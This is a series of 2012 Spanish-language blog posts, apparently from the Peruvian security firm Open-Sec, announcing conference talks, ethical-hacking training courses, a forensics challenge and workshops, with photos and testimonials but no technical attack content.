<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="Default">
<b><span style="font-family: "Arial","sans-serif";">- Convirtiendo un browser en una herramienta de Hacking</span></b><span style="font-family: "Arial","sans-serif";"> , <br />
La cual estará a cargo de Walter Cuestas </span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">(<a href="https://twitter.com/wcu35745" target="_blank">@wcu35745</a>)</span><span style="font-family: "Arial","sans-serif";">
Actual Gerente General y co-fundador de Open-Sec.<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="Default">
<b><span style="font-family: "Arial","sans-serif";">- Hackeando Cajeros automáticos, desde el punto de vista de
un pentester</span></b><span style="font-family: "Arial","sans-serif";"><br />
Dirigida por Mauricio Urizar</span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;"> (<a href="https://twitter.com/MauricioUrizar" target="_blank">@MauricioUrizar</a>)</span><span style="font-family: "Arial","sans-serif";"> , consultor sénior de la empresa.<o:p></o:p></span></div>
<div class="Default">
<br /></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;">También desarrollaremos, un taller sobre nmap , en donde se verán técnicas para el escaneo de puertos y servicios, análisis de vulnerabilidades y explotar como explotarlas.<o:p></o:p></span></div>
<div class="Default">
<br /></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;">La lista completa de charlas y ponentes la pueden encontrar aquí :</span></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;"><a href="http://www.campus-party.com.ec/2012/seguridad-y-redes.html">http://www.campus-party.com.ec/2012/seguridad-y-redes.html</a></span></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="Default">
<br /></div>
<div class="Default">
<b><br /></b></div>
<div class="Default">
<b><span style="font-family: "Arial","sans-serif";"><a href="http://www.elastixworld.com/2012/" target="_blank">VOIP2DAY + ELASTIXWORLD 2012</a></span></b><span style="font-family: "Arial","sans-serif";"><o:p></o:p></span></div>
<div class="Default">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-SIsFwKmS-vc/UFNbxHTR5eI/AAAAAAAAAGg/3jwuHHWPNGo/s1600/Selecci%C3%B3n_659.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="http://1.bp.blogspot.com/-SIsFwKmS-vc/UFNbxHTR5eI/AAAAAAAAAGg/3jwuHHWPNGo/s400/Selecci%C3%B3n_659.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="Default">
<b><br /></b></div>
<div class="Default">
<b><br /></b></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">Este año dos
grandes e importantes eventos se juntan, VoIP2Day + ElastixWorld, convirtiéndose
en una cita obligatoria para miles de profesionales del sector de la telefonía
y comunicaciones en todo el Mundo.<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">VoIP2Day +
ElastixWorld se llevará a cabo los días 25,26 y 27 de Septiembre en la
Feria IFEMA : en Madrid, España<o:p></o:p></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">En donde Juan
Oliva (<a href="https://twitter.com/jroliva" target="_blank">@jroliva</a>) consultor</span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;"> </span><span style="font-family: "Arial","sans-serif";">de
Opens-Sec , participará con la charla :<o:p></o:p></span></div>
<div class="Default">
<b><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;"><br /></span></b><b><span style="font-family: "Arial","sans-serif";">- Ethical hacking a plataformas Elastix</span></b></div>
<div class="Default">
<br /></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="Default">
</div>
<div class="Default">
<span style="font-family: Arial, sans-serif;">La lista completa de charlas la pueden encontrar aquí :</span></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="Default">
<span style="font-family: Arial, sans-serif;"><a href="http://www.elastixworld.com/2012/es/conferences/conference-agenda.html">http://www.elastixworld.com/2012/es/conferences/conference-agenda.html</a></span></div>
<div class="Default">
<br /></div>
<div class="Default">
<br /></div>
<br />
<div class="Default">
<br /></div>
<div class="Default">
<span style="font-family: "Arial","sans-serif";">Esto sin duda
nos llena de orgullo y felicidad, a
todos los que conforman el equipo de Open-Sec, ya que seremos los </span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">ú</span><span style="font-family: "Arial","sans-serif";">nicos peruanos en participar en el <b>Campus
Party Quito 2012</b> y en el caso <b>VoIP2Day y ElastixWorld 2012</b> el </span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">ú</span><span style="font-family: "Arial","sans-serif";">nico </span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">p</span><span style="font-family: "Arial","sans-serif";">eruano hablando de ethical </span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">h</span><span style="font-family: "Arial","sans-serif";">acking en Europa, algo que no se habia presentado</span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">,</span><span style="font-family: "Arial","sans-serif";"> desde hace mucho tiempo</span><span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES-PE;">.<o:p></o:p></span></div>
Anonymousnoreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-11217435063128395042012-08-30T02:07:00.004-05:002012-08-30T18:48:17.573-05:00Memorias del Open-Sec Ethical Hacker – Lima 2012 (Agosto)<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Tal como fue <a href="http://ehopen-sec.blogspot.com/2012/07/open-sec-ethical-hacker-lima-2012_18.html" target="_blank">anunciado</a> el pasado 17,18 y 19 de agosto
realizamos nuestro entrenamiento intensivo en Ethical Hacking (<a href="http://en.wikipedia.org/wiki/Open-Sec_Ethical_Hacker" target="_blank">OSEH</a>) , en esta
oportunidad abierto para el público.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Fue una jornada muy intensa, durante las 24 horas de entrenamiento, hubo mucha participación durante los retos y trabajo en equipo.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Queremos compartirles algunos comentarios recogidos, los
cuales demuestra la madurez de nuestra propuesta de entrenamiento y hace
nuestra certificación válida, no solo a nivel nacional, si no también
internacional.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Testimonios :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/UR_hx6klGRY/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/UR_hx6klGRY&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/UR_hx6klGRY&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br /></div>
<div class="MsoNormal">
<br />
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/jTdMU_nwL2o/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/jTdMU_nwL2o&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/jTdMU_nwL2o&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />
Este es un correo de un participante, el cual apreciamos mucho, ya que no solo manifiesta los aspectos diferenciales de nuestro curso, si no también elementos, que tenemos que seguir mejorando del mismo.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-vU_afBAOCD4/UD-3xnHxyjI/AAAAAAAAAGM/cZocFIXFFtY/s1600/OSEH4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="http://1.bp.blogspot.com/-vU_afBAOCD4/UD-3xnHxyjI/AAAAAAAAAGM/cZocFIXFFtY/s640/OSEH4.png" width="600" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Algunas imágenes del curso:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal">
<br /></div>
<div class="prezi-player">
<style media="screen" type="text/css">.prezi-player { width: 550px; } .prezi-player-links { text-align: center; }</style><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" height="400" id="prezi_7izd3mrqs1sy" name="prezi_7izd3mrqs1sy" width="550"><param name="movie" value="http://prezi.com/bin/preziloader.swf"/><param name="allowfullscreen" value="true"/><param name="allowFullScreenInteractive" value="true"/><param name="allowscriptaccess" value="always"/><param name="bgcolor" value="#ffffff"/><param name="flashvars" value="prezi_id=7izd3mrqs1sy&lock_to_path=1&color=ffffff&autoplay=no&autohide_ctrls=0"/><embed id="preziEmbed_7izd3mrqs1sy" name="preziEmbed_7izd3mrqs1sy" src="http://prezi.com/bin/preziloader.swf" type="application/x-shockwave-flash" allowfullscreen="true" allowFullScreenInteractive="true" allowscriptaccess="always" width="550" height="400" bgcolor="#ffffff" flashvars="prezi_id=7izd3mrqs1sy&lock_to_path=1&color=ffffff&autoplay=no&autohide_ctrls=0"></embed></object><br />
<div class="prezi-player-links">
<a href="http://prezi.com/7izd3mrqs1sy/open-sec-ethical-hacker-lima-2012-agosto/" title="Open-Sec Ethical Hacker – Lima 2012 (Agosto)">Open-Sec Ethical Hacker – Lima 2012 (Agosto)</a> on <a href="http://prezi.com/">Prezi</a><br />
<br />
<br />
<div style="text-align: left;">
Queremos agradecer a todos los participantes de esta edición, por la confianza otorgada.<br />
<br /></div>
<div style="text-align: left;">
Finalmente, estamos coordinando agendas para poder programar una nueva jornada de entrenamiento, así como el lanzamiento público, de las nuevas propuestas de entrenamiento, que estamos desarrollando :<br />
<br />
- OSEH versión 2<br />
- OPEN-SEC WEB HACKER<b> (OSWH)</b><br />
<br />
Estén atentos !!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-69115853028258644262012-08-29T23:39:00.000-05:002012-08-29T23:39:12.316-05:00Open-Sec realiza entrenamiento para la Marina de Guerra del PerúEn esta oportunidad tuvimos el honor de ser elegidos, para realizar entrenamiento en Ethical Hacking para la Marina de Guerra del Perú.<br />
<br />
<a href="http://2.bp.blogspot.com/-bMkD8UpdCiQ/UD7syePjwjI/AAAAAAAAAE0/KLBs46EC5JA/s1600/escudo-mgp.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" height="195" src="http://2.bp.blogspot.com/-bMkD8UpdCiQ/UD7syePjwjI/AAAAAAAAAE0/KLBs46EC5JA/s200/escudo-mgp.jpg" width="200" /></a><br />
<br />
Durante mas de 40 horas, personal de la Marina recibió adiestramiento en tecnicas de Pentesting, tales como:<br />
<br />
* Scripting para pentesters<br />
* Footprint<br />
* Escaneo de servicios y vulnerabilidades<br />
* Explotación de vulnerabilidades web,<br />
* Uso de frameworks de exploits<br />
* Y técnicas de ataques informáticos.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-1142420473059173802.post-55118914647861990422012-08-05T22:21:00.000-05:002012-08-05T22:21:31.877-05:00Entrenamiento OSEH en ESPOL Ecuador<br />
Durante los días 29, 30 Junio y 01 de Julio del presente, estuvimos nuevamente en Guayaquil con el objetivo de dictar el curso <a href="http://en.wikipedia.org/wiki/Open-Sec_Ethical_Hacker" target="_blank">Open-Sec Ethical Hacker</a> como parte del programa de estudio de la Maestria de Seguridad Informática Aplicada dictada en la <a href="http://www.espol.edu.ec/" target="_blank">ESPOL</a> (Escuela Superior Politécnica del Litoral).<br />
<br />
El curso duró 3 dias full day en donde impartimos entrenamiento intensivo en tecnicas de hacking, retos al estilo de los famosos capture of the flag.<br />
<br />
El entrenamiento tuvo gran aceptación y los participantes demostraron mucho entusiasmo e interés. Fruto del curso tuvo 43 nuevos certificados como <a href="http://en.wikipedia.org/wiki/Open-Sec_Ethical_Hacker" target="_blank">Open-Sec Ethical Hacker</a>.<br />
<br />
Algunos comentarios de los participantes :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-_--cl6Qmhzs/UB8wilKbKfI/AAAAAAAAAD8/V3N1OXLWYEY/s1600/Selecci%C3%B3n_461.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="http://3.bp.blogspot.com/-_--cl6Qmhzs/UB8wilKbKfI/AAAAAAAAAD8/V3N1OXLWYEY/s400/Selecci%C3%B3n_461.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xemrNQItI3Q/UB8wsXX0ZlI/AAAAAAAAAEE/XPI7ChXzQe0/s1600/Selecci%C3%B3n_459.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="http://4.bp.blogspot.com/-xemrNQItI3Q/UB8wsXX0ZlI/AAAAAAAAAEE/XPI7ChXzQe0/s400/Selecci%C3%B3n_459.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-viHOY5neLRo/UB8xEEIK65I/AAAAAAAAAEU/IRTVvUXrwxw/s1600/Selecci%C3%B3n_458.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://3.bp.blogspot.com/-viHOY5neLRo/UB8xEEIK65I/AAAAAAAAAEU/IRTVvUXrwxw/s400/Selecci%C3%B3n_458.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-rmqA23r1OPY/UB8wySqnyHI/AAAAAAAAAEM/dHXPmIgEVQ0/s1600/Selecci%C3%B3n_457.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="http://2.bp.blogspot.com/-rmqA23r1OPY/UB8wySqnyHI/AAAAAAAAAEM/dHXPmIgEVQ0/s400/Selecci%C3%B3n_457.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-dnYp8px2mJg/UB827X6mGDI/AAAAAAAAAEk/24Wx7A9lhjk/s1600/Selecci%C3%B3n_462.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://3.bp.blogspot.com/-dnYp8px2mJg/UB827X6mGDI/AAAAAAAAAEk/24Wx7A9lhjk/s400/Selecci%C3%B3n_462.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
También algunas fotos :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ybyEgj2I7ts/UB8okHQ5qoI/AAAAAAAAADU/KBn5bWIAXHU/s1600/IMAG1373.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://4.bp.blogspot.com/-ybyEgj2I7ts/UB8okHQ5qoI/AAAAAAAAADU/KBn5bWIAXHU/s320/IMAG1373.jpg" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-wVEhF3W9yCQ/UB8o3Eak_qI/AAAAAAAAADc/Gf7tJbV1HFI/s1600/IMAG1389.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://4.bp.blogspot.com/-wVEhF3W9yCQ/UB8o3Eak_qI/AAAAAAAAADc/Gf7tJbV1HFI/s320/IMAG1389.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-qF1GDb0Garc/UB8pMViuUYI/AAAAAAAAADk/-dbtSjcesJ4/s1600/IMAG1381.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="http://4.bp.blogspot.com/-qF1GDb0Garc/UB8pMViuUYI/AAAAAAAAADk/-dbtSjcesJ4/s320/IMAG1381.jpg" width="320" /></a></div>
<br />
<div style="text-align: center;">
Y donde está Mauricio Urizar ???</div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-CbXuWxRhglA/UB8pjmTXfYI/AAAAAAAAADs/0Vyndl2h0OA/s1600/IMAG1447.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-CbXuWxRhglA/UB8pjmTXfYI/AAAAAAAAADs/0Vyndl2h0OA/s320/IMAG1447.jpg" width="190" /></a></div>
<br />Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-21571567290406538672012-07-18T12:37:00.000-05:002012-08-01T19:23:15.848-05:00Open-Sec Ethical Hacker – Lima 2012Debido a algunas solicitudes, decidimos lanzar nuevamente nuestro curso de entrenamiento <a href="http://en.wikipedia.org/wiki/Open-Sec_Ethical_Hacker" target="_blank">Open-Sec Ethical Hacker (OSEH)</a> para el mes de agosto del presenta año, a continuación algunos alcances del mismo.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/--Vnci5QmaMw/UAbwtQ6UKlI/AAAAAAAAADI/WQgSGcWH-vo/s1600/OSEH.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/--Vnci5QmaMw/UAbwtQ6UKlI/AAAAAAAAADI/WQgSGcWH-vo/s1600/OSEH.jpg" /></a></div>
<br />
<br />
El curso de Ethical Hacking @ 2012 esta definido en base a metodologías como OSSTMM, OWASP, ISSAF y con los tópicos mas importantes de programas de certificación como C|EH (Certified | Ethical Hacker), GPEN (GIAC Certified Penetration Tester), OSCP (Offensive Security Certified Professional), C)PTE (Certified Penetration Tester Engineer) y la experiencia propia de los consultores en diversas empresas en Latino América que, además, cuentan con la certificaciones de más prestigio en Ethical Hacking : C|EH, GPEN, OSCP y C)PTE.<br />
<br />
La dinamica del curso es 95% practica y se basa en la utilización de técnicas y herramientas en ejercicios individuales y grupales denominados retos o Capture the Flag donde los participantes obtienen puntajes por penetrar los sistemas objetivos colocados por los instructores y los sistemas de los otros participantes. El puntaje obtenido se suma al que obtengan en el examen que se realiza al finalizar el curso para obtener la certificación de Open-Sec Ethical Hacker.<br />
<br />
<br />
<b>OBJETIVOS</b><br />
Luego del curso el alumno será capaz de<br />
<br />
- Utilizar las técnicas de los “hackers” cuando atacan servidores y clientes a través de Internet.<br />
- Tener el conocimiento necesario para realizar una prueba de penetración.<br />
- Utilizar en forma práctica las herramientas que se utilizan en un proceso de Ethical Hacking.<br />
Conocer las metodologías OSSTMM y OWASP.<br />
- Formar parte el exclusivo grupo de personas certificadas como Open-Sec Ethical Hacker (actualmente se encuentran certificadas más de 335 personas en Perú, Ecuador y Honduras).<br />
<br />
Más información en : <b><a href="http://www.open-sec.com/OSEH2012/">http://www.open-sec.com/OSEH2012/</a></b><br />
<br />
<br />
Algunas ediciones anteriores :<br />
OSEH en Tarapoto-Perú : <a data-mce-href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html" href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html">http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html</a><br />
OSEH en Guayaquil-Ecuador : <a data-mce-href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html" href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html">http://ehopen-sec.blogspot.com/2010/11/oseh-en-ecuador.html </a><br />
OSEH en HONDURAS : <a data-mce-href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html" href="http://ehopen-sec.blogspot.com/2010/07/oseh-en-tarapoto.html">http://ehopen-sec.blogspot.com/2010/12/oseh-honduras.html</a><br />
<br />
Más información sobre la certificación <a href="http://en.wikipedia.org/wiki/Open-Sec_Ethical_Hacker" target="_blank">OSEH</a><br />
<br />
<b><br /></b><br />
<br />
<br />Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-64671672828030627422012-07-05T15:50:00.003-05:002012-07-05T16:43:24.835-05:00II Reto Forense Digital Sudamericano – Perú Chavín de Huantar 2012<span style="font-family: verdana;">Por segundo año<span style="font-weight: bold;"> </span></span><a style="font-family: verdana; font-weight: bold;" href="http://issaperu.org">ISSA Lima, Perú Chapter</a><span style="font-family: verdana;"> esta realizando el </span><span style="font-weight: bold; font-family: verdana;">Reto Forense Digital Sudamericano – Perú Chavín de Huantar</span><span style="font-family: verdana;">, invitando a los responsables de la seguridad informática, auditores, administradores de redes, sistemas, estudiantes y público interesado de los países de Bolivia, Brazil, Colombia, Chile, Ecuador, Panamá, Paraguay, Perú, Argentina, Uruguay y Venezuela a participar en el </span><b style="font-family: verdana;">"II Reto Forense Digital Sudamericano - Perú Chavín de Huantar 2012"</b><span style="font-family: verdana;">.<br /><br />El reto consiste básicamente en analizar las imágenes de un sistema comprometido y presentar un informe con la información requerida en el escenario supuesto.<br /></span><br /><span style="font-family: verdana;">Estos informes pasaran por una evaluación del jurado, del cual formo parte, y se reconocerá públicamente a los tres mejores informes en el evento por el<span style="font-weight: bold;"> "Día Internacional de la Seguridad de la Información - Perú DISI 2012″</span>. Los trabajos serán revisados por un panel de expertos.<br /><br />Asimismo, todos los análisis serán publicados como aporte a la comunidad en seguridad informática.<br /><br />Para mayor información :<br /><br />http://issaperu.org/?p=1067<br /><br /></span>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-31987199322318532262012-06-12T20:55:00.001-05:002012-06-12T20:55:43.471-05:00Hacking Day Open-Sec en ICA<br />
<div style="margin-bottom: 0cm;">
El pasado 09 de junio , tuvimos
el gusto de ser invitados por la Universidad Privada Alas Peruanas de
ICA , a una rueda de charlas de seguridad, con temas como Google Hacking , Seguridad en Aplicaciones web, Hacking a cajeros automáticos , Hacking Voip , las cuales estuvieron a cargo de los consultores senior: Mauricio Urizar
@MauricioUrizar , Jhon Vargas @John_Vargas , Alfredo Garcia
@garciacajo y Juan Oliva @jroliva</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="margin-bottom: 0cm;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Vo3I8hCB4IQ/T9fsAkSdvaI/AAAAAAAAACY/tZF2XKMA4bk/s1600/389675_10151801745110343_1217941896_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-Vo3I8hCB4IQ/T9fsAkSdvaI/AAAAAAAAACY/tZF2XKMA4bk/s320/389675_10151801745110343_1217941896_n.jpg" width="209" /></a></div>
<div style="margin-bottom: 0cm;">
<br /></div>
<br />
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="margin-bottom: 0cm;">
</div>
<div style="margin-bottom: 0cm; text-align: center;">
El evento tuvo mucha acogida y
esperamos volver pronto , aquí algunas fotos :</div>
<div style="margin-bottom: 0cm; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-B5jvKYzbAbQ/T9fsiVN_H2I/AAAAAAAAACg/HvpfK4jqq0I/s1600/20120609_102929.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-B5jvKYzbAbQ/T9fsiVN_H2I/AAAAAAAAACg/HvpfK4jqq0I/s320/20120609_102929.jpg" width="240" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-VurtxfQB3LM/T9ftBjTIynI/AAAAAAAAACo/vGFMxNaAaoM/s1600/20120609_163311.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-VurtxfQB3LM/T9ftBjTIynI/AAAAAAAAACo/vGFMxNaAaoM/s320/20120609_163311.jpg" width="240" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NDoqYz_c50w/T9ftkZbEhHI/AAAAAAAAAC0/CczcmmJ_vqk/s1600/20120609_110659.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-NDoqYz_c50w/T9ftkZbEhHI/AAAAAAAAAC0/CczcmmJ_vqk/s320/20120609_110659.jpg" width="240" /></a></div>
<div style="margin-bottom: 0cm; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dLoErkSFHQ8/T9fvgylR-TI/AAAAAAAAAC8/1eoodsLevU0/s1600/20120609_183025.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-dLoErkSFHQ8/T9fvgylR-TI/AAAAAAAAAC8/1eoodsLevU0/s320/20120609_183025.jpg" width="240" /></a></div>
<div style="margin-bottom: 0cm;">
<br /></div>Anonymousnoreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-70346339134552380952012-06-08T10:20:00.001-05:002012-06-08T10:22:37.181-05:00GuayaquilHack 2012Hoy en día abundan los eventos de seguridad, cada vez más se tienen
eventos de in-seguridad y también hay mucha oferta de entrenamientos de
hacking. Nosotros mismos tenemos uno llamado OSEH que promovemos de
alguna forma, pero, hace tiempo queriamos hacer dos talleres de tipo
avanzado e introducir uno nuevo.<br />
<br />
Los talleres avanzados corresponden a Web Application Hacking y Exploit
Development. El introductorio corresponde a Computación Forense.<br />
<br />
Decidimos lanzarlos en Guayaquil porque estaremos dictando 2 cursos de
Ethical Hacking en la ESPOL (como todos los años) y lo denominamos
GuayaquilHack 2012 porque esperamos que sea el inicio.<br />
<br />
Como dicen, las imágenes valen más que mil palabras :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipl98j_eSuCznjSu-KaKbvkkx4g_8akFdbBRhOu2T5iRMqZ89BqFG1fHtyoXUuBFsXwNbq7TtstA1yUsmyWrF8sF65lCuPF14S3nbtn493pgXjOT3VNOh0SCF18rZyagWid9-eEqqaCEE/s1600/GuayaquilHack2012-WebAppHacking.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipl98j_eSuCznjSu-KaKbvkkx4g_8akFdbBRhOu2T5iRMqZ89BqFG1fHtyoXUuBFsXwNbq7TtstA1yUsmyWrF8sF65lCuPF14S3nbtn493pgXjOT3VNOh0SCF18rZyagWid9-eEqqaCEE/s400/GuayaquilHack2012-WebAppHacking.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilUds9gLkI9GFlwVi0VT-jecChKPqJ0Mcsc4MJvDHfPa8L058fXMqQMBSFKrMrXKjsJkOK12KOFL1Xu2Zenyp2uPAAEsWK5-LMtstcjs-guylKoLR_ty-F5utYF6vPZyh0McdQqN0VR4/s1600/GuayaquilHack2012-Forensia.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilUds9gLkI9GFlwVi0VT-jecChKPqJ0Mcsc4MJvDHfPa8L058fXMqQMBSFKrMrXKjsJkOK12KOFL1Xu2Zenyp2uPAAEsWK5-LMtstcjs-guylKoLR_ty-F5utYF6vPZyh0McdQqN0VR4/s400/GuayaquilHack2012-Forensia.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
